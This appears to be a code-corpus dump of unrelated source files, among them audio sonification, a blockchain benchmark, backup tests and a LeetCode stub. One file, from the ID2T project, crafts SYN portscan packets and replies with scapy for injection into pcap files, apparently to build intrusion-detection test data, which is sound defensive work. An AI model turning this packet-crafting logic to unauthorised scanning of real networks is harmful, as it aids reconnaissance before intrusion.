""" How long each individual note will be in seconds."""
return self._note_duration
@note_duration.setter
def note_duration(self, value):
# Add in min value check
self._note_duration = value
@property
def note_spacing(self):
""" The spacing of the notes on average (will adjust based on time) in seconds. """
return self._note_spacing
@note_spacing.setter
def note_spacing(self, value):
# Add in min value check
self._note_spacing = value
def sonify(self):
"""
Perform the sonification, two columns will be added to the data table: asf_pitch, and asf_onsets.
The asf_pitch column will contain the sonified data in Hz.
The asf_onsets column will contain the start time for each note in seconds from the first note.
Metadata will also be added to the table giving information about the duration and spacing
of the sonified pitches, as well as an adjustable gain.
"""
data = self.data
exptime = np.median(np.diff(data[self.time_col]))
data.meta["asf_exposure_time"] = exptime
data.meta["asf_note_duration"] = self.note_duration
data.meta["asf_spacing"] = self.note_spacing
data["asf_pitch"] = self.pitch_mapper(data[self.val_col])
data["asf_onsets"] = [x for x in (data[self.time_col] - data[self.time_col][0])/exptime*self.note_spacing]
def play(self):
"""
Play the data sonification.
"""
# Making sure we have a clean server
if self.server.getIsBooted():
self.server.shutdown()
self.server.boot()
self.server.start()
# Getting data ready
duration = self.data.meta["asf_note_duration"]
pitches = np.repeat(self.data["asf_pitch"], 2)
delays = np.repeat(self.data["asf_onsets"], 2)
# TODO: This doesn't seem like the best way to do this, but I don't know
# how to make it better
env = pyo.Linseg(list=[(0, 0), (0.01, 1), (duration - 0.1, 1),
(duration - 0.05, 0.5), (duration - 0.005, 0)],
mul=[self.gain for i in range(len(pitches))]).play(
delay=list(delays), dur=duration)
self.streams = pyo.Sine(list(pitches), 0, env).out(delay=list(delays),
dur=duration)
def stop(self):
"""
Stop playing the data sonification.
"""
self.streams.stop()
def write(self, filepath):
"""
Save data sonification to the given file.
Currently the only output option is a wav file.
Parameters
----------
filepath : str
The path to the output file.
"""
# Getting data ready
duration = self.data.meta["asf_note_duration"]
pitches = np.repeat(self.data["asf_pitch"], 2)
delays = np.repeat(self.data["asf_onsets"], 2)
# Making sure we have a clean server
if self.server.getIsBooted():
self.server.shutdown()
self.server.reinit(audio="offline")
self.server.boot()
self.server.recordOptions(dur=delays[-1]+duration, filename=filepath)
env = pyo.Linseg(list=[(0, 0), (0.1, 1), (duration - 0.1, 1),
(duration - 0.05, 0.5), (duration - 0.005, 0)],
mul=[self.gain for i in range(len(pitches))]).play(
delay=list(delays), dur=duration)
sine = pyo.Sine(list(pitches), 0, env).out(delay=list(delays), dur=duration) # noqa: F841
self.server.start()
# Clean up
self.server.shutdown()
self.server.reinit(audio="portaudio")
| 2.5 | 2 |
Week 5/id_510/s/LeetCode_72_510.py | larryRishi/algorithm004-05 | 1 | 12761479 | <reponame>larryRishi/algorithm004-05
##
#给定两个单词 word1 和 word2,计算出将 word1 转换成 word2 所使用的最少操作数 。
#
# 你可以对一个单词进行如下三种操作:
#
# 插入一个字符
# 删除一个字符
# 替换一个字符
# 示例 1:
#
# 输入: word1 = "horse", word2 = "ros"
# 输出: 3
# 解释:
# horse -> rorse (将 'h' 替换为 'r')
# rorse -> rose (删除 'r')
# rose -> ros (删除 'e')
# 示例 2:
#
# 输入: word1 = "intention", word2 = "execution"
# 输出: 5
# 解释:
# intention -> inention (删除 't')
# inention -> enention (将 'i' 替换为 'e')
# enention -> exention (将 'n' 替换为 'x')
# exention -> exection (将 'n' 替换为 'c')
# exection -> execution (插入 'u')
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/edit-distance
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
#/
class Solution:
def minDistance(self, word1: str, word2: str) -> int:
pass
| 3.390625 | 3 |
src/benchmark.py | Emory-AIMS/idash2019 | 3 | 12761480 | <gh_stars>1-10
import time
import os
from pathlib import Path
from tqdm import tqdm
from utils import *
from blockchain import Blockchain
from localDB import LocalDB
import json
from logger import log
import logging
# log.setLevel(logging.DEBUG)
# log.setLevel(logging.ERROR)
data_dir = '/home/mark/idash2019/data'
TRANSACTION_GAS = 21000
BLOCKING = False
def benchmark(contract, size):
contract_dir = f"./contract/{contract}"
contracts = load_contracts(contract_dir)
main_contract = f"{contract}.sol"
main_contract = Path(contract_dir).joinpath(main_contract).resolve()
contracts.remove(main_contract)
records = load_data(data_dir)[:size]
bc = Blockchain(blocking=BLOCKING, libraries=contracts,
contract=main_contract, ipcfile='/home/mark/eth/node0/geth.ipc',
timeout=120)
db = LocalDB()
result = {}
tx_hashs = []
elapsed = 0
for record in tqdm(records):
tx_hash = bc.insert(*record)
elapsed += timer(db.insert, *record)
tx_hashs.append(tx_hash)
receipts = bc.wait_all(tx_hashs)
totalGas = sum([r['gasUsed'] for r in receipts])
# Measured by gas
result['Storage'] = {'Unit': 'gas',
'Total': totalGas, 'Average': totalGas // size}
# Measured by time
result['Insertion'] = {'Unit': 'second',
'Total': elapsed, 'Average': elapsed / size}
query = {f"{i} *": 0 for i in range(4)}
query['Unit'] = 'second'
elapsed = timer(bc.query, "*", "*", "*")
query["3 *"] = elapsed
for key in tqdm(db.getKeys()):
pks = possibleKeys(key)
for i, pk in enumerate(pks):
elapsed = timer(bc.query, *pk)
if i in [0, 1, 3]:
query["2 *"] += elapsed
elif i in [2, 4, 5]:
query["1 *"] += elapsed
else:
query["0 *"] += elapsed
query["Average"] = query["2 *"] + \
query["1 *"] + query["0 *"] + query["3 *"]
query["Average"] /= (7 * size + 1)
query["2 *"] /= (3*size)
query["1 *"] /= (3*size)
query["0 *"] /= size
result['Query'] = query
return result
def main():
sizes = [100 * (4**i) for i in range(4)]
# sizes = [100]
final = {s: {} for s in sizes}
baselines = [f"baseline{i}" for i in [2, 3, 4, 5]]
for size in sizes:
for baseline in baselines:
print(baseline)
final[size][baseline] = benchmark(baseline, size)
with open('benchmark.json', 'w') as f:
json.dump(final, f)
if __name__ == '__main__':
main()
| 2.140625 | 2 |
hs_access_control/management/commands/groups_with_public_resources.py | tommac7/hydroshare | 0 | 12761481 | """
This prints a list of publicly accessible resources in a group
"""
from django.core.management.base import BaseCommand
from hs_access_control.models import GroupAccess
def usage():
print("groups_with_public_resources usage:")
print(" groups_with_public_resources ")
def shorten(title, length):
if len(title) <= length:
return title
else:
return title[0:19]+'...'
def access_type(thing):
if thing['published']:
return 'published'
elif thing['public']:
return 'public'
elif thing['discoverable']:
return 'discoverable'
else:
return 'private'
class Command(BaseCommand):
help = """List public groups."""
def handle(self, *args, **options):
for g in GroupAccess.groups_with_public_resources():
# n = g.gaccess.public_resources.count()
print("group is {} (id={})".format(g.name, g.id))
| 2.953125 | 3 |
dannce/utils/rat7m/loadStructs.py | diegoaldarondo/dannce | 1 | 12761482 | <gh_stars>1-10
import scipy.io as sio
import numpy as np
def load_data(path, key):
d = sio.loadmat(path,struct_as_record=False)
dataset = vars(d[key][0][0])
# Data are loaded in this annoying structure where the array
# we want is at dataset[i][key][0,0], as a nested array of arrays.
# Simplify this structure (a numpy record array) here.
# Additionally, cannot use views here because of shape mismatches. Define
# new dict and return.
import pdb;pdb.set_trace()
data = []
for d in dataset:
d_ = {}
for key in d.dtype.names:
d_[key] = d[key][0, 0]
data.append(d_)
return data
def load_cameras(path):
d = sio.loadmat(path,struct_as_record=False)
dataset = vars(d["cameras"][0][0])
camnames = dataset['_fieldnames']
cameras = {}
for i in range(len(camnames)):
cameras[camnames[i]] = {}
cam = vars(dataset[camnames[i]][0][0])
fns = cam['_fieldnames']
for fn in fns:
cameras[camnames[i]][fn] = cam[fn]
return cameras
def load_mocap(path):
d = sio.loadmat(path,struct_as_record=False)
dataset = vars(d["mocap"][0][0])
markernames = dataset['_fieldnames']
mocap = []
for i in range(len(markernames)):
mocap.append(dataset[markernames[i]])
return np.stack(mocap, axis=2) | 2.5625 | 3 |
tests/test_operations.py | messa/baq | 1 | 12761483 | from datetime import datetime
import gzip
import json
import os
from pytest import fixture
from time import sleep
from baq.operations import backup, restore
from baq.backends import FileBackend
@fixture
def sample_age_key(temp_dir):
secret_key_path = temp_dir / 'age_key'
secret_key_path.write_text('<KEY>')
public_key = '<KEY>'
return public_key
def test_backup_and_restore_without_encryption(temp_dir):
(temp_dir / 'src').mkdir()
(temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
(temp_dir / 'src/dir1').mkdir()
(temp_dir / 'src/dir1/sample.txt').write_text('This is dir1/sample.txt\n')
backend = FileBackend(temp_dir / 'backup_target')
backup_result = backup(temp_dir / 'src', backend=backend, recipients=[], recipients_files=[])
backup_id = backup_result.backup_id
(temp_dir / 'restored').mkdir()
restore(temp_dir / 'restored', backend, backup_id, [])
assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
assert sorted(p.name for p in (temp_dir / 'backup_target').iterdir()) == [
f'baq.{backup_id}.data.00000',
f'baq.{backup_id}.meta',
]
def test_backup_and_restore(temp_dir, sample_age_key):
(temp_dir / 'src').mkdir()
(temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
(temp_dir / 'src/dir1').mkdir()
(temp_dir / 'src/dir1/sample.txt').write_text('This is dir1/sample.txt\n')
backend = FileBackend(temp_dir / 'backup_target')
backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
backup_id = backup_result.backup_id
(temp_dir / 'restored').mkdir()
restore(temp_dir / 'restored', backend, backup_id, [temp_dir / 'age_key'])
assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
assert sorted(p.name for p in (temp_dir / 'backup_target').iterdir()) == [
f'baq.{backup_id}.data.00000',
f'baq.{backup_id}.meta',
]
meta_path = temp_dir / f'backup_target/baq.{backup_id}.meta'
meta_content = [json.loads(line) for line in gzip.decompress(meta_path.read_bytes()).splitlines()]
assert meta_content == [
{
'baq_backup': {
'file_format_version': 'v1',
'backup_id': backup_id,
'date': meta_content[0]['baq_backup']['date'],
'encryption_keys': [
{
'backup_id': backup_id,
'sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
'age_encrypted': meta_content[0]['baq_backup']['encryption_keys'][0]['age_encrypted'],
}
]
}
}, {
'directory': {
'atime': meta_content[1]['directory']['atime'],
'ctime': meta_content[1]['directory']['ctime'],
'mtime': meta_content[1]['directory']['mtime'],
'uid': meta_content[1]['directory']['uid'],
'gid': meta_content[1]['directory']['gid'],
'mode': meta_content[1]['directory']['mode'],
'path': '.',
}
}, {
'file': {
'atime': meta_content[2]['file']['atime'],
'ctime': meta_content[2]['file']['ctime'],
'mtime': meta_content[2]['file']['mtime'],
'uid': meta_content[2]['file']['uid'],
'gid': meta_content[2]['file']['gid'],
'mode': meta_content[2]['file']['mode'],
'path': 'hello.txt',
}
}, {
'content': {
'offset': 0,
'sha3_512': 'adb798d7b4c94952e61c5d9beed5d3bf9443460f5d5a9f17eb32def95bc23ba8608f7630ea236958602500d06f5c19c64114c06ce09f1b92301b9c3fc73f0728',
'encryption_key_sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
'df_name': f'baq.{backup_id}.data.00000',
'df_offset': 0,
'df_size': 33,
}
}, {
'file_done': {
'sha3_512': 'adb798d7b4c94952e61c5d9beed5d3bf9443460f5d5a9f17eb32def95bc23ba8608f7630ea236958602500d06f5c19c64114c06ce09f1b92301b9c3fc73f0728',
}
}, {
'directory': {
'atime': meta_content[5]['directory']['atime'],
'ctime': meta_content[5]['directory']['ctime'],
'mtime': meta_content[5]['directory']['mtime'],
'uid': meta_content[5]['directory']['uid'],
'gid': meta_content[5]['directory']['gid'],
'mode': meta_content[5]['directory']['mode'],
'path': 'dir1',
}
}, {
'file': {
'atime': meta_content[6]['file']['atime'],
'ctime': meta_content[6]['file']['ctime'],
'mtime': meta_content[6]['file']['mtime'],
'uid': meta_content[6]['file']['uid'],
'gid': meta_content[6]['file']['gid'],
'mode': meta_content[6]['file']['mode'],
'path': 'dir1/sample.txt',
}
}, {
'content': {
'offset': 0,
'sha3_512': 'd318a04d4a61bcb9f2f10a9523c30cfef69922fea0a3c4c1c7f5f01fed01cea9ee4a9a14e29126fadb0427eae42df1efa8a0cd18eb0d75a96241a1da432dbe8d',
'encryption_key_sha1': meta_content[0]['baq_backup']['encryption_keys'][0]['sha1'],
'df_name': f'baq.{backup_id}.data.00000',
'df_offset': 33,
'df_size': 49,
}
}, {
'file_done': {
'sha3_512': 'd318a04d4a61bcb9f2f10a9523c30cfef69922fea0a3c4c1c7f5f01fed01cea9ee4a9a14e29126fadb0427eae42df1efa8a0cd18eb0d75a96241a1da432dbe8d'
}
}, {
'done': {
'backup_id': backup_id,
'date': meta_content[-1]['done']['date'],
}
}
]
def test_incremental_backup_and_restore(temp_dir, sample_age_key):
(temp_dir / 'src').mkdir()
(temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
(temp_dir / 'src/big').write_bytes(os.urandom(3 * 2**20))
backend = FileBackend(temp_dir / 'backup_target')
backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
backup_id_1 = backup_result.backup_id
while datetime.utcnow().strftime('%Y%m%dT%H%M%SZ') == backup_result.backup_id:
sleep(0.05)
with (temp_dir / 'src/big').open(mode='r+b') as f:
f.write(os.urandom(100))
backend = FileBackend(temp_dir / 'backup_target')
backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
backup_id_2 = backup_result.backup_id
assert (temp_dir / 'backup_target' / f'baq.{backup_id_1}.data.00000').is_file()
assert (temp_dir / 'backup_target' / f'baq.{backup_id_1}.data.00000').stat().st_size > 3000000
assert (temp_dir / 'backup_target' / f'baq.{backup_id_2}.data.00000').is_file()
assert (temp_dir / 'backup_target' / f'baq.{backup_id_2}.data.00000').stat().st_size < 1500000
(temp_dir / 'restored').mkdir()
restore(temp_dir / 'restored', backend, backup_id_2, [temp_dir / 'age_key'])
assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
#assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
| 2.03125 | 2 |
external/artifacts/fv3net/artifacts/report_search.py | ai2cm/fv3net | 1 | 12761484 | <filename>external/artifacts/fv3net/artifacts/report_search.py<gh_stars>1-10
import asyncio
import dataclasses
import json
import itertools
import os
from typing import Mapping, Optional, Sequence, Set
import gcsfs
import fsspec
from .utils import _list, _cat_file, _close_session
@dataclasses.dataclass
class ReportIndex:
"""Mapping from run urls to sequences of report urls."""
reports_by_run: Mapping[str, Sequence[str]] = dataclasses.field(
default_factory=dict
)
@property
def reports(self) -> Set[str]:
"""The available reports."""
_reports = [v for v in self.reports_by_run.values()]
return set(itertools.chain.from_iterable(_reports))
def compute(self, url, filename="index.html"):
"""Compute reports_by_run index from all reports found at url.
Args:
url: path to directory containing report subdirectories.
filename: name of report html files.
Note:
Reports are assumed to be located at {url}/*/{filename}.
"""
loop = asyncio.get_event_loop()
if url.startswith("gs://"):
fs = gcsfs.GCSFileSystem(asynchronous=True)
else:
fs = fsspec.filesystem("file")
self.reports_by_run = loop.run_until_complete(
self._get_reports(fs, url, filename)
)
loop.run_until_complete(_close_session(fs))
@staticmethod
def from_json(url: str) -> "ReportIndex":
"""Initialize from existing JSON file."""
with fsspec.open(url) as f:
index = ReportIndex(json.load(f))
return index
def public_links(self, run_url: str) -> Sequence[str]:
"""Return public links for all reports containing a run_url."""
if run_url not in self.reports_by_run:
print(f"Provided URL {run_url} not found in any report.")
public_links = []
else:
public_links = [
self._insert_public_domain(report_url)
for report_url in self.reports_by_run[run_url]
]
return public_links
def dump(self, url: str):
with fsspec.open(url, "w") as f:
json.dump(self.reports_by_run, f, sort_keys=True, indent=4)
async def _get_reports(self, fs, url, filename) -> Mapping[str, Sequence[str]]:
"""Generate mapping from run URL to report URLs for all reports found at
{url}/*/{filename}."""
out = {}
for report_dir in await _list(fs, url):
report_url = self._url_prefix(fs) + os.path.join(report_dir, filename)
try:
report_head = await _cat_file(fs, report_url, end=5 * 1024)
except FileNotFoundError:
pass
else:
report_lines = report_head.decode("UTF-8").split("\n")
for line in report_lines:
run_url = _get_run_url(line)
if run_url:
out.setdefault(run_url, []).append(report_url)
return out
@staticmethod
def _url_prefix(fs) -> str:
if isinstance(fs, gcsfs.GCSFileSystem):
return "gs://"
elif isinstance(fs, fsspec.implementations.local.LocalFileSystem):
return ""
else:
raise ValueError(f"Protocol prefix unknown for {fs}.")
@staticmethod
def _insert_public_domain(url) -> str:
if url.startswith("gs://"):
return url.replace("gs://", "https://storage.googleapis.com/")
elif url.startswith("/"):
return url
else:
raise ValueError(f"Public domain unknown for url {url}.")
def _get_run_url(line: str) -> Optional[str]:
if "<td> gs://" in line:
# handles older style reports
return line.split("<td>")[1].split("</td>")[0].strip()
elif '": "gs://' in line:
# handles newer style reports generated after
# https://github.com/ai2cm/fv3net/pull/1304
return line.split(": ")[1].strip('",')
else:
return None
def main(args):
if args.write:
index = ReportIndex()
index.compute(args.reports_url)
index.dump(os.path.join(args.reports_url, "index.json"))
index = ReportIndex.from_json(os.path.join(args.reports_url, "index.json"))
for link in index.public_links(args.url):
print(link)
def register_parser(subparsers):
parser = subparsers.add_parser("report", help="Search for prognostic run reports.")
parser.add_argument("url", help="A prognostic run URL.")
parser.add_argument(
"-r",
"--reports-url",
help=(
"Location of prognostic run reports. Defaults to gs://vcm-ml-public/argo. "
"Search uses index at REPORTS_URL/index.json"
),
default="gs://vcm-ml-public/argo",
)
parser.add_argument(
"-w",
"--write",
help="Recompute index and write to REPORTS_URL/index.json before searching.",
action="store_true",
)
parser.set_defaults(func=main)
| 2.328125 | 2 |
code/Attack/PortscanAttack.py | TomasMadeja/ID2T | 33 | 12761485 | import logging
import random as rnd
import lea
import scapy.layers.inet as inet
import Attack.BaseAttack as BaseAttack
import Lib.Utility as Util
from Attack.Parameter import Parameter, Boolean, Float, IPAddress, MACAddress, Port
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# noinspection PyPep8
class PortscanAttack(BaseAttack.BaseAttack):
PORT_SOURCE = 'port.src'
PORT_DESTINATION = 'port.dst'
PORT_OPEN = 'port.open'
PORT_DEST_SHUFFLE = 'port.dst.shuffle'
PORT_DEST_ORDER_DESC = 'port.dst.order-desc'
IP_SOURCE_RANDOMIZE = 'ip.src.shuffle'
PORT_SOURCE_RANDOMIZE = 'port.src.shuffle'
def __init__(self):
"""
Creates a new instance of the PortscanAttack.
This attack injects TCP Syn-requests and respective responses into the output pcap file.
"""
# Initialize attack
super(PortscanAttack, self).__init__("Portscan Attack", "Injects a nmap 'regular scan'",
"Scanning/Probing")
# Define allowed parameters and their type
self.update_params([
Parameter(self.IP_SOURCE, IPAddress()),
Parameter(self.IP_DESTINATION, IPAddress()),
Parameter(self.PORT_SOURCE, Port()),
Parameter(self.PORT_DESTINATION, Port()),
Parameter(self.PORT_OPEN, Port()),
Parameter(self.MAC_SOURCE, MACAddress()),
Parameter(self.MAC_DESTINATION, MACAddress()),
Parameter(self.PORT_DEST_SHUFFLE, Boolean()),
Parameter(self.PORT_DEST_ORDER_DESC, Boolean()),
Parameter(self.IP_SOURCE_RANDOMIZE, Boolean()),
Parameter(self.PACKETS_PER_SECOND, Float()),
Parameter(self.PORT_SOURCE_RANDOMIZE, Boolean())
])
def init_param(self, param: str) -> bool:
"""
Initialize a parameter with a default value specified in the specific attack.
:param param: parameter, which should be initialized
:return: True if initialization was successful, False if not
"""
value = None
if param == self.IP_SOURCE:
value = self.statistics.get_most_used_ip_address()
elif param == self.IP_SOURCE_RANDOMIZE:
value = 'False'
elif param == self.MAC_SOURCE:
ip_src = self.get_param_value(self.IP_SOURCE)
if ip_src is None:
return False
value = self.get_mac_address(ip_src)
elif param == self.IP_SOURCE_RANDOMIZE:
value = 'False'
elif param == self.IP_DESTINATION:
ip_src = self.get_param_value(self.IP_SOURCE)
if ip_src is None:
return False
value = self.statistics.get_random_ip_address(ips=[ip_src])
elif param == self.MAC_DESTINATION:
ip_dst = self.get_param_value(self.IP_DESTINATION)
if ip_dst is None:
return False
value = self.get_mac_address(ip_dst)
elif param == self.PORT_DESTINATION:
value = self.get_ports_from_nmap_service_dst(1000)
elif param == self.PORT_OPEN:
value = '1'
elif param == self.PORT_DEST_SHUFFLE:
value = 'False'
elif param == self.PORT_DEST_ORDER_DESC:
value = 'False'
elif param == self.PORT_SOURCE:
value = rnd.randint(1024, 65535)
elif param == self.PORT_SOURCE_RANDOMIZE:
value = 'False'
elif param == self.PACKETS_PER_SECOND:
value = self.statistics.get_most_used_pps()
elif param == self.INJECT_AFTER_PACKET:
value = rnd.randint(0, self.statistics.get_packet_count())
if value is None:
return False
return self.add_param_value(param, value)
def generate_attack_packets(self):
"""
Creates the attack packets.
"""
mac_source = self.get_param_value(self.MAC_SOURCE)
mac_destination = self.get_param_value(self.MAC_DESTINATION)
# Determine ports
dest_ports = self.get_param_value(self.PORT_DESTINATION)
if self.get_param_value(self.PORT_DEST_ORDER_DESC):
dest_ports.reverse()
elif self.get_param_value(self.PORT_DEST_SHUFFLE):
rnd.shuffle(dest_ports)
if self.get_param_value(self.PORT_SOURCE_RANDOMIZE):
# FIXME: why is sport never used?
sport = rnd.randint(1, 65535)
else:
sport = self.get_param_value(self.PORT_SOURCE)
# Timestamp
timestamp_next_pkt = self.get_param_value(self.INJECT_AT_TIMESTAMP)
# store start time of attack
self.attack_start_utime = timestamp_next_pkt
# Initialize parameters
ip_source = self.get_param_value(self.IP_SOURCE)
if isinstance(ip_source, list):
ip_source = ip_source[0]
ip_destination = self.get_param_value(self.IP_DESTINATION)
if not isinstance(ip_destination, list):
ip_destination = [ip_destination]
# Check ip.src == ip.dst
self.ip_src_dst_catch_equal(ip_source, ip_destination)
for ip in ip_destination:
# Select open ports
ports_open = self.get_param_value(self.PORT_OPEN)
if ports_open == 1: # user did not specify open ports
# the ports that were already used by ip.dst (direction in) in the background traffic are open ports
ports_used_by_ip_dst = self.statistics.process_db_query(
"SELECT portNumber FROM ip_ports WHERE portDirection='in' AND ipAddress='" + ip + "'")
if ports_used_by_ip_dst:
ports_open = ports_used_by_ip_dst
else: # if no ports were retrieved from database
# Take open ports from nmap-service file
# ports_temp = self.get_ports_from_nmap_service_dst(100)
# ports_open = ports_temp[0:rnd.randint(1,10)]
# OR take open ports from the most used ports in traffic statistics
ports_open = self.statistics.process_db_query(
"SELECT portNumber FROM ip_ports GROUP BY portNumber ORDER BY SUM(portCount) DESC LIMIT " + str(
rnd.randint(1, 10)))
# in case of one open port, convert ports_open to array
if not isinstance(ports_open, list):
ports_open = [ports_open]
# Set MSS (Maximum Segment Size) based on MSS distribution of IP address
source_mss_dist = self.statistics.get_mss_distribution(ip_source)
if len(source_mss_dist) > 0:
source_mss_prob_dict = lea.Lea.fromValFreqsDict(source_mss_dist)
source_mss_value = source_mss_prob_dict.random()
else:
source_mss_value = Util.handle_most_used_outputs(self.statistics.get_most_used_mss_value())
destination_mss_dist = self.statistics.get_mss_distribution(ip)
if len(destination_mss_dist) > 0:
destination_mss_prob_dict = lea.Lea.fromValFreqsDict(destination_mss_dist)
destination_mss_value = destination_mss_prob_dict.random()
else:
destination_mss_value = Util.handle_most_used_outputs(self.statistics.get_most_used_mss_value())
# Set TTL based on TTL distribution of IP address
source_ttl_dist = self.statistics.get_ttl_distribution(ip_source)
if len(source_ttl_dist) > 0:
source_ttl_prob_dict = lea.Lea.fromValFreqsDict(source_ttl_dist)
source_ttl_value = source_ttl_prob_dict.random()
else:
source_ttl_value = Util.handle_most_used_outputs(self.statistics.get_most_used_ttl_value())
destination_ttl_dist = self.statistics.get_ttl_distribution(ip)
if len(destination_ttl_dist) > 0:
destination_ttl_prob_dict = lea.Lea.fromValFreqsDict(destination_ttl_dist)
destination_ttl_value = destination_ttl_prob_dict.random()
else:
destination_ttl_value = Util.handle_most_used_outputs(self.statistics.get_most_used_ttl_value())
# Set Window Size based on Window Size distribution of IP address
source_win_dist = self.statistics.get_win_distribution(ip_source)
if len(source_win_dist) > 0:
source_win_prob_dict = lea.Lea.fromValFreqsDict(source_win_dist)
source_win_value = source_win_prob_dict.random()
else:
source_win_value = Util.handle_most_used_outputs(self.statistics.get_most_used_win_size())
destination_win_dist = self.statistics.get_win_distribution(ip)
if len(destination_win_dist) > 0:
destination_win_prob_dict = lea.Lea.fromValFreqsDict(destination_win_dist)
destination_win_value = destination_win_prob_dict.random()
else:
destination_win_value = Util.handle_most_used_outputs(self.statistics.get_most_used_win_size())
min_delay, max_delay = self.get_reply_latency(ip_source, ip)
for dport in dest_ports:
# Parameters changing each iteration
if self.get_param_value(self.IP_SOURCE_RANDOMIZE) and isinstance(ip_source, list):
ip_source = rnd.choice(ip_source)
# 1) Build request package
request_ether = inet.Ether(src=mac_source, dst=mac_destination)
request_ip = inet.IP(src=ip_source, dst=ip, ttl=source_ttl_value)
# Random src port for each packet
sport = rnd.randint(1, 65535)
request_tcp = inet.TCP(sport=sport, dport=dport, window=source_win_value, flags='S',
options=[('MSS', source_mss_value)])
request = (request_ether / request_ip / request_tcp)
request.time = timestamp_next_pkt
# Append request
self.add_packet(request, ip_source, ip)
# 2) Build reply (for open ports) package
if dport in ports_open: # destination port is OPEN
reply_ether = inet.Ether(src=mac_destination, dst=mac_source)
reply_ip = inet.IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
reply_tcp = inet.TCP(sport=dport, dport=sport, seq=0, ack=1, flags='SA', window=destination_win_value,
options=[('MSS', destination_mss_value)])
reply = (reply_ether / reply_ip / reply_tcp)
timestamp_reply = self.timestamp_controller.next_timestamp(latency=min_delay)
reply.time = timestamp_reply
self.add_packet(reply, ip_source, ip)
# requester confirms
confirm_ether = request_ether
confirm_ip = request_ip
confirm_tcp = inet.TCP(sport=sport, dport=dport, seq=1, window=0, flags='R')
confirm = (confirm_ether / confirm_ip / confirm_tcp)
self.timestamp_controller.set_timestamp(timestamp_reply)
timestamp_confirm = self.timestamp_controller.next_timestamp(latency=min_delay)
confirm.time = timestamp_confirm
self.add_packet(confirm, ip_source, ip)
# else: destination port is NOT OPEN -> no reply is sent by target
self.timestamp_controller.set_timestamp(timestamp_next_pkt)
timestamp_next_pkt = self.timestamp_controller.next_timestamp()
def generate_attack_pcap(self):
"""
Creates a pcap containing the attack packets.
:return: The location of the generated pcap file.
"""
# store end time of attack
self.attack_end_utime = self.packets[-1].time
# write attack packets to pcap
pcap_path = self.write_attack_pcap(sorted(self.packets, key=lambda pkt: pkt.time))
# return packets sorted by packet time_sec_start
return len(self.packets), pcap_path
| 2.65625 | 3 |
tests/datasets/test_eigenscape_raw.py | lucaspbastos/soundata | 177 | 12761486 | <filename>tests/datasets/test_eigenscape_raw.py<gh_stars>100-1000
import numpy as np
from tests.test_utils import run_clip_tests
from soundata import annotations
from soundata.datasets import eigenscape_raw
TEST_DATA_HOME = "tests/resources/sound_datasets/eigenscape_raw"
def test_clip():
default_clipid = "Beach-01-Raw"
dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
clip = dataset.clip(default_clipid)
expected_attributes = {
"audio_path": (
"tests/resources/sound_datasets/eigenscape_raw/Beach-01-Raw.wav"
),
"clip_id": "Beach-01-Raw",
}
expected_property_types = {
"audio": tuple,
"tags": annotations.Tags,
"location": str,
"date": str,
"time": str,
"additional_information": str,
}
run_clip_tests(clip, expected_attributes, expected_property_types)
def test_load_audio():
default_clipid = "Beach-01-Raw"
dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
clip = dataset.clip(default_clipid)
audio_path = clip.audio_path
audio, sr = eigenscape_raw.load_audio(audio_path)
assert sr == 48000
assert type(audio) is np.ndarray
assert len(audio.shape) == 2 # check audio is loaded correctly
assert audio.shape[0] == 32 # check audio is 32ch (HOA 4th order)
assert audio.shape[1] == 48000 * 1.0 # Check audio duration is as expected
def test_load_tags():
# dataset
default_clipid = "Beach-01-Raw"
dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
clip = dataset.clip(default_clipid)
assert len(clip.tags.labels) == 1
assert clip.tags.labels[0] == "Beach"
assert np.allclose([1.0], clip.tags.confidence)
def test_load_metadata():
# dataset
default_clipid = "Beach-01-Raw"
dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
clip = dataset.clip(default_clipid)
assert clip.location == "Bridlington Beach"
assert clip.time == "10:42"
assert clip.date == "09/05/2017"
assert clip.additional_information == ""
def test_to_jams():
default_clipid = "Beach-01-Raw"
dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
clip = dataset.clip(default_clipid)
jam = clip.to_jams()
assert jam.validate()
# Validate Tags
tags = jam.search(namespace="tag_open")[0]["data"]
assert len(tags) == 1
assert tags[0].time == 0
assert tags[0].duration == 1.0
assert tags[0].value == "Beach"
assert tags[0].confidence == 1
# validate metadata
assert jam.file_metadata.duration == 1.0
assert jam.sandbox.location == "Bridlington Beach"
assert jam.sandbox.time == "10:42"
assert jam.sandbox.date == "09/05/2017"
assert jam.annotations[0].annotation_metadata.data_source == "soundata"
| 2.390625 | 2 |
data_pre_processing.py | Jorge-Nario/cs542 | 0 | 12761487 | <gh_stars>0
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
scaler1 = MinMaxScaler(feature_range=(0, 1))
scaler0 = StandardScaler()
#Importing sample data
news_data = pd.read_csv("/Users/jonathanhale/Documents/Courses/Machine Learning/example_data/news_sample (1).csv")
mkt_data = pd.read_csv("/Users/jonathanhale/Documents/Courses/Machine Learning/example_data/marketdata_sample (1).csv")
def pre_process_data (news_data, mkt_data):
# Delete unnecessary columns
